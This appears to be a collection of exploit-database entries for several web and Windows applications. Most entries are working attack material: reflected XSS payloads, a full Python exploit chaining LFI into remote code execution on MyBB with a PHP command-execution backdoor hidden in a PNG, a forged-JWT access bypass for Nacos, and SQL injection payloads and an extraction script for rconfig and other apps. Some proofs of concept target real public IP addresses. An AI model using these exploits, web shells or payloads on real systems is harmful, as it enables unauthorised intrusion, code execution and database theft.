<pre><code># Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)<br /># Date: 20/01/2023<br /># Exploit Author: Rahul Patwari<br /># Vendor Homepage: https://phpgurukul.com/<br /># Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip<br /># Version: 1.0<br /># Tested on: XAMPP / Windows 10<br /># CVE : CVE-2023-23161<br /><br /># Proof of Concept:<br /># 1- Install The application Art Gallery Management System Project v1.0<br /><br /># 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints<br /><br /># 3- Now Insert XSS Payload on artname parameter.<br />the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E<br /><br /># 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E<br /><br /># 5- XSS has been triggered.<br /><br /># Go to this url "<br />https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E<br />"<br />XSS will trigger.<br /><br /></code></pre>
<pre><code># Exploit Title: MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)<br /># Date: 2023-01-19<br /># Exploit Author: lUc1f3r11 (https://github.com/FDlucifer)<br /># Vendor Homepage: https://mybb.com/<br /># Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1832<br /># Version: MyBB 1.8.32<br /># Tested on: Linux<br /># CVE : N/A<br /># Detailed Analysis : https://fdlucifer.github.io/2023/01/17/mybb1-8-32-LFI-RCE/<br /><br /># (1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir.<br /># (2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english.<br /># (3). This chained bugs can lead to Authenticated RCE.<br /># (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32.<br />#<br />#<br /># Exp Usage:<br /># 1.first choose a png file that size less than 1kb<br /># 2.then merge the png file with a php simple backdoor file using the following commands<br /># mac@xxx-2 php-backdoor % cat simple-backdoor.php <br /># <?php<br /># if(isset($_REQUEST['cmd'])){<br /># echo "<getshell success>";<br /># $cmd = ($_REQUEST['cmd']);<br /># system($cmd);<br /># echo "<getshell success>";<br /># phpinfo();<br /># }<br /># ?><br /># mac@xxx-2 php-backdoor % ls <br /># simple-backdoor.php test.png<br /># mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png <br /># mac@xxx-2 php-backdoor % file test.png <br /># test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced<br /># 3.finnally run the following commands to run the exp script to get RCE output! enjoy the shell...<br /># python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd"<br /><br /><br />import requests<br />import argparse<br />from bs4 import BeautifulSoup<br />from requests_toolbelt import MultipartEncoder<br />import re<br /><br /><br />r_clients = requests.Session()<br /><br /><br />def exploit(username, password, email, host, file, cmd):<br /> # Adding ./inc upload path settings to bypass avatar upload path blacklists<br /><br /> data = {<br /> "username" : username,<br /> "password" : password,<br /> "do" : "login"<br /> }<br /><br /> login_txt = r_clients.post(host + "/admin/index.php", data=data).text<br /><br /> if "The username and password combination you entered is invalid" in login_txt:<br /> print("[-] Login failure. Incorrect credentials supplied")<br /> exit(0)<br /><br /> print("[+] Login successful!")<br /><br /> if "Access Denied" in login_txt:<br /> print("[-] Supplied user doesn't have the rights to add a setting")<br /> exit(0)<br /><br /> print("[*] Adding ./inc upload path settings...")<br /><br /> soup = BeautifulSoup(login_txt, "lxml")<br /> my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']<br /> print("[+] my_post_key: ", my_post_key)<br /> print("[+] cookies: ", r_clients.cookies.get_dict())<br /> cookies = r_clients.cookies.get_dict()<br /><br /> data = {<br /> "my_post_key" : my_post_key,<br /> "gid" : 10,<br /> "upsetting[sigmycode]" : 1,<br /> "upsetting[sigcountmycode]" : 1,<br /> "upsetting[sigsmilies]" : 1,<br /> "upsetting[sightml]" : 0,<br /> "upsetting[sigimgcode]" : 1,<br /> "upsetting[maxsigimages]" : 2,<br /> "upsetting[siglength]" : 255,<br /> "upsetting[hidesignatures]" : "",<br /> "upsetting[hidewebsite]" : "",<br /> "upsetting[useravatar]" : "./inc",<br /> "upsetting[useravatardims]" : "100x100",<br /> "upsetting[useravatarrating]" : 0,<br /> "upsetting[maxavatardims]" : "100x100",<br /> "upsetting[avatarsize]" : 25,<br /> "upsetting[avatarresizing]" : "auto",<br /> "upsetting[avataruploadpath]" : "./inc",<br /> "upsetting[allowremoteavatars]" : 1,<br /> "upsetting[customtitlemaxlength]" : 40,<br /> "upsetting[allowaway]" : 1,<br /> "upsetting[allowbuddyonly]" : 0<br /> }<br /><br /> modify_settings_txt = r_clients.post(host + "/admin/index.php?module=config-settings&action=change",data=data,allow_redirects=False, cookies=cookies)<br /><br /> if modify_settings_txt.status_code != 302:<br /> soup = BeautifulSoup(modify_settings_txt.text, "lxml")<br /> error_txt = soup.find_all("div", {"class" : "error"})[0].text<br /> print("[-] modify upload path failed. Reason: '{}'".format(error_txt))<br /> exit(0)<br /><br /> print("[+] ./inc upload path settings added!")<br /><br /> # upload malicious avatar in admin panel<br /> with open("test.png", "rb") as f:<br /> image_binary = f.read()<br /> print("[+] read image successful! ")<br /><br /> print("[+] image contents: ", image_binary)<br /><br /> filename = "test.png"<br /><br /> data1 = {<br /> 'my_post_key': my_post_key,<br /> 'username': username,<br /> 'email': email,<br /> 'avatar_upload': (filename, open(filename, 'rb'), 'image/png')<br /> }<br /><br /> m = MultipartEncoder(data1)<br /><br /> headers = {<br /> "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": m.content_type,<br /> "Origin": "null",<br /> "Connection": "close",<br /> "Upgrade-Insecure-Requests": "1"<br /> }<br /><br /> upload_url = host + "/admin/index.php?module=user-users&action=edit&uid=1"<br /><br /> upload = r_clients.post(upload_url, data=m, allow_redirects=False, headers=headers, cookies=cookies)<br /><br /> if upload.status_code != 302:<br /> soup = BeautifulSoup(upload.text, "lxml")<br /> error_txt = soup.find_all("div", {"class" : "error"})[0].text<br /> print("[-] upload avatar didn't work. Reason: '{}'".format(error_txt))<br /> exit(0)<br /><br /> print("[+] upload malicious avatar png success!")<br /><br /> # commands exec and get the output, we are done finally :)<br /> data2 = {<br /> 'my_post_key': my_post_key,<br /> 'file': file,<br /> 'lang': "english",<br /> 'editwith': "..",<br /> 'inadmin': 0<br /> }<br /><br /> exec_url = host + "/admin/index.php?module=config-languages&action=edit&cmd=" + cmd<br /><br /> commands_exec = r_clients.post(exec_url, data=data2, cookies=cookies)<br /><br /> if commands_exec.status_code != 200:<br /> soup = BeautifulSoup(commands_exec.text, "lxml")<br /> error_txt = soup.find_all("div", {"class" : "error"})[0].text<br /> print("[-] command exec didn't work. Reason: '{}'".format(error_txt))<br /> exit(0)<br /><br /> cmd_output = re.findall(r'<getshell success>(.*?)<getshell success>', commands_exec.text, re.S)<br /><br /> print("[+] exec status: ", commands_exec.status_code)<br /> print("[+] command exec success:\n\n", cmd_output[0].replace("\n", "\n"))<br /><br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('--username', required=True, help="MyBB Admin CP username")<br />parser.add_argument('--password', required=True, help="MyBB Admin CP password")<br />parser.add_argument('--email', required=True, help="MyBB Admin CP admin's email (easy to find in admin users panal)")<br />parser.add_argument('--file', required=True, help="the image file name in the server that we uploaded before. (easy to find in admin users panal)")<br />parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")<br />parser.add_argument('--cmd', required=False, help="Command to run")<br />args = parser.parse_args()<br /><br />username = args.username<br />password = args.password<br />email = args.email<br />file = args.file<br />host = args.host<br />cmd = "id" if args.cmd == None else args.cmd<br /><br />print("""_______________________________________\n<br />/ MyBB 1.8.32 - Chained LFI Remote Code \ \n<br />\ Execution (RCE) (Authenticated) / \n<br /> --------------------------------------- \n<br /> \ ^__^ \n<br /> \ (oo)\_______ \n<br /> (__)\ )\/\ \n<br /> ||----w | \n<br /> || || \n<br />Author: lUc1f3r11<br />Github: https://github.com/FDlucifer""")<br />exploit(username, password, email, host, file, cmd)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2023-01-18<br /># Vendor : Microsoft<br /># Version : 15.02.1118.007<br /># Tested on OS: Microsoft Exchange Server 2019 CU12<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc MSExchangeADTopology<br />[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br /><br />NOME_SERVIZIO: MSExchangeADTopology<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_AVVIO : 2 AUTO_START<br /> CONTROLLO_ERRORE : 1 NORMAL<br /> NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe<br /> GRUPPO_ORDINE_CARICAMENTO : <br /> TAG : 0<br /> NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology<br /> DIPENDENZE :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path<br /># Date: 2023/01/17<br /># Exploit Author : Wim Jaap van Vliet<br /># Vendor Homepage: www.clevo.com.tw<br /># Software Link: https://enstrong.blob.core.windows.net/en-driver/PDXXPNX1/Others/CC30_1006.zip<br /># Version: 2.1.0.6<br /># Tested on: Windows 11 Pro 10.0.22000<br /><br /># Exploit<br />The Hotkey Clipboard Service 'HKClipSvc', installed as part of Control Center3.0 v3.97 (and earlier versions) by Clevo has a unquoted service path.<br />This software package is usually installed on Clevo laptops (or other brands using Clevo barebones) as a driver.<br />This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.<br /><br /># Information<br /> <br />C:\>sc qc "HKClipSvc"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: HKClipSvc<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : HotKey Clipboard Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Nacos 2.0.3 - Access Control vulnerability<br /># Date: 2023-01-17<br /># Exploit Author: Jenson Zhao<br /># Vendor Homepage: https://nacos.io/<br /># Software Link: https://github.com/alibaba/nacos/releases/<br /># Version: Up to (including)2.0.3<br /># Tested on: Windows 10<br /># CVE : CVE-2021-43116<br /># Required before execution: pip install PyJWT,requests<br />import argparse<br />import base64<br />import requests<br />import time<br />import json<br />from jwt.algorithms import has_crypto, requires_cryptography<br />from jwt.utils import base64url_encode, force_bytes<br />from jwt import PyJWS<br /><br />class MyPyJWS(PyJWS):<br /> def encode(self,<br /> payload, # type: Union[Dict, bytes]<br /> key, # type: str<br /> algorithm='HS256', # type: str<br /> headers=None, # type: Optional[Dict]<br /> json_encoder=None # type: Optional[Callable]<br /> ):<br /> segments = []<br /><br /> if algorithm is None:<br /> algorithm = 'none'<br /><br /> if algorithm not in self._valid_algs:<br /> pass<br /><br /> # Header<br /> header = {'alg': algorithm}<br /><br /> if headers:<br /> self._validate_headers(headers)<br /> header.update(headers)<br /><br /> json_header = force_bytes(<br /> json.dumps(<br /> header,<br /> separators=(',', ':'),<br /> cls=json_encoder<br /> )<br /> )<br /><br /> segments.append(base64url_encode(json_header))<br /> segments.append(base64url_encode(payload))<br /><br /> # Segments<br /> signing_input = b'.'.join(segments)<br /> try:<br /> alg_obj = self._algorithms[algorithm]<br /> key = alg_obj.prepare_key(key)<br /> signature = alg_obj.sign(signing_input, key)<br /><br /> except KeyError:<br /> if not has_crypto and algorithm in requires_cryptography:<br /> raise NotImplementedError(<br /> "Algorithm '%s' could not be found. Do you have cryptography "<br /> "installed?" % algorithm<br /> )<br /> else:<br /> raise NotImplementedError('Algorithm not supported')<br /><br /> segments.append(base64url_encode(signature))<br /><br /> return b'.'.join(segments)<br /><br /><br />def JwtGenerate():<br /> Secret = 'SecretKey01234567890123456789012345678901234567890123456789012345678'<br /> payload = json.dumps(<br /> {<br /> "sub": "nacos",<br /> "exp": int(time.time()) + 3600<br /> },<br /> separators=(',', ':')<br /> ).encode('utf-8')<br /> encoded_jwt = MyPyJWS().encode(payload, base64.urlsafe_b64decode(Secret), algorithm='HS256')<br /> return encoded_jwt.decode()<br /><br />def check(url, https, token):<br /> if https:<br /> r = requests.get(<br /> url='https://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=',<br /> verify=False)<br /> else:<br /> r = requests.get(<br /> url='http://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=')<br /> if r.status_code == 403:<br /> print("There is no CVE-2021-43116 problem with the url!")<br /> else:<br /> print("There is CVE-2021-43116 problem with the url!")<br /><br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-t", "--target", help="URL of the target. example: 192.168.1.1:8848")<br /> parser.add_argument("-s", "--https", help="Whether https is used. Default is false")<br /> args = parser.parse_args()<br /> url = args.target<br /> https = False<br /> if (args.https):<br /> https = args.https<br /> if url:<br /> check(url, https, JwtGenerate())<br /> else:<br /> print('Please enter URL!')<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path <br /># Exploit Author: Laguin Benjamin (MONK-MODE)<br /># Discovery Date: 2023-19-01<br /># Vendor Homepage: https://personifyinc.com/<br /># Software Link: https://personifyinc.com/download/chromacam<br /># Tested Version: Chromacam-4.0.3.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 10 x64<br /># CVE: In progress<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />Personify Frame Transformer PsyFrameGrabberService C:\Program Files<br />(x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe Auto<br /><br />C:\>sc qc "PsyFrameGrabberService"<br />[SC] QueryServiceConfig réussite(s)<br /><br />SERVICE_NAME: PsyFrameGrabberService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files<br />(x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Personify Frame Transformer<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>systeminfo<br /><br />Host Name: DESKTOP-1000<br />OS Name: Microsoft Windows 10 Professionnel<br />OS Version: 10.0.19044 N/A build 19044<br /><br /># Exploit<br />If an attacker had already compromised the system and the current user has<br />the privileges to write in the : C:\Program Files (x86)\ "C:\Program Files<br />(x86)\Personify" "C:\Program Files (x86)\Personify\ChromaCam" "C:\Program<br />Files (x86)\Personify\ChromaCam\64" folder or in "C:\" , he could place his<br />own "Program.exe" or "PsyFrameGrabberService.exe" files respectively, and<br />when the service starts, it would launch the malicious file, rather than<br />the original "PsyFrameGrabberService.exe".<br />The service starts automatically at bood and runs in system<br /><br /></code></pre>
<pre><code>Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection<br />Date: 2022.12.7<br />Exploit Author: TLF<br />Vendor Homepage: https://www.yiquantech.com/pc/about.html<br />Software Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/<br />Version: EQ v1.5.31 to v2.2.0<br />Tested on: windows 10<br />CVE : CVE-2022-45297 <br /><br /><br />POC:<br />POST /Account/Login HTTP/1.1 <br />Host: 121.8.146.131 <br />User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0<br />Content-Length: 118 <br />Accept: application/json, text/javascript, */*; q=0.01 <br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Content-Type: application/x-www-form-urlencoded; <br />charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg <br />Origin: http://121.8.146.131<br />Referer: http://121.8.146.131/Account/Login <br />X-Requested-With: XMLHttpRequest <br />Accept-Encoding: gzip<br />RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27<br /><br /></code></pre>
<pre><code>## Title: Online-Pizza-Ordering-1.0-Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03.31.2023<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `email` parameter appears to be vulnerable to SQL injection attacks.<br />The attacker easily can steal all information from the database, and<br />it depends on the time he will need to decrypt this information,<br />he can decrypt and use this information for very malicious purposes.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: email=ZfCPbAWN@burpcollaborator.net' and '3479'='3479'<br />AND 2244=2244 AND 'GqOB'='GqOB&password=b0E!i9g!K9<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=ZfCPbAWN@burpcollaborator.net' and '3479'='3479' OR<br />(SELECT 8595 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT<br />(ELT(8595=8595,1))),0x71716a7071,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br />'FXYe'='FXYe&password=b0E!i9g!K9<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=ZfCPbAWN@burpcollaborator.net' and '3479'='3479'<br />AND (SELECT 3772 FROM (SELECT(SLEEP(7)))xChJ) AND<br />'pJWv'='pJWv&password=b0E!i9g!K9<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/qil6by)<br /><br />## Time spend:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)<br /># Exploit Author: azhen<br /># Date: 10/12/2022<br /># Vendor Homepage: https://www.rconfig.com/<br /># Software Link: https://www.rconfig.com/<br /># Vendor: rConfig<br /># Version: <= v3.9.7<br /># Tested against Server Host: Linux<br /># CVE: CVE-2022-45030<br /><br />import requests<br />import sys<br />import urllib3<br />urllib3.disable_warnings()<br /><br />s = requests.Session()<br /><br /># sys.argv.append("192.168.10.150") #Enter the hostname<br /><br />if len(sys.argv) != 2:<br /> print("Usage: python3 rconfig_sqli_3.9.7.py <host>")<br /> sys.exit(1)<br /><br />host=sys.argv[1] #Enter the hostname<br /><br /><br />def get_data(host):<br /> print("[+] Get db data...")<br /> vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"<br /><br /> query_exp = "database()"<br /> result_data = ""<br /><br /> for i in range(1, 100):<br /> burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}<br /> res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)<br /> # print(res.text)<br /><br /> a = chr(int(res.text[6:10]) - 1000)<br /><br /> if a == '\x00':<br /> break<br /><br /> result_data += a<br /> <br /> print(result_data)<br /> <br /> print("[+] Database name: {}".format(result_data))<br /><br /> '''<br /> output:<br /> [+] Logging in...<br /> [+] Get db data...<br /> r<br /> rc<br /> rco<br /> rcon<br /> rconf<br /> rconfi<br /> rconfig<br /> rconfigd<br /> rconfigdb<br /> [+] Database name: rconfigdb <br /> '''<br /><br /><br />def login(host):<br /> print("[+] Logging in...")<br /> url = "https://"+host+":443/lib/crud/userprocess.php"<br /> headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}<br /> <br /> data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin<br /> response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)<br /> get_data(host)<br /><br />login(host)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path<br /># Date: 11/17/2022<br /># Exploit Author: Damian Semon Jr (Blue Team Alpha)<br /># Version: 1.8.5<br /># Vendor Homepage: https://masterplus.coolermaster.com/<br /># Software Link: https://masterplus.coolermaster.com/<br /># Tested on: Windows 10 64x<br /><br /># Step to discover the unquoted service path:<br />wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """<br /><br />CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto<br /><br /># Info on the service:<br />C:\>sc qc MPService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MPService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : CoolerMaster MasterPlus Technology Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /> <br /> <br />#Exploit:<br />A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. <br />Ex: (C:\Program.exe)<br /><br /></code></pre>